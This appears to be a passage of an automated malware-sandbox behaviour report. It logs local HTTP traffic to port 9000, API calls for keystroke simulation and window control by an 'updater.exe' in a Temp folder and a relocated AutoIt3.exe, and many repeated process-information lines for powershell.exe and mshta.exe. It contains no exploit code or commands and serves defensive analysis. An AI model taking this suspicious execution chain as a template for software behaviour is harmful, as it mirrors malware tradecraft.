Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 50135 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50135
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50136

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_003959B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	20_2_003959B3
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_00325EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	20_2_00325EDA
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00D059B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	22_2_00D059B3
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00C95EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	22_2_00C95EDA

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_003333B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

20_2_003333B7

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
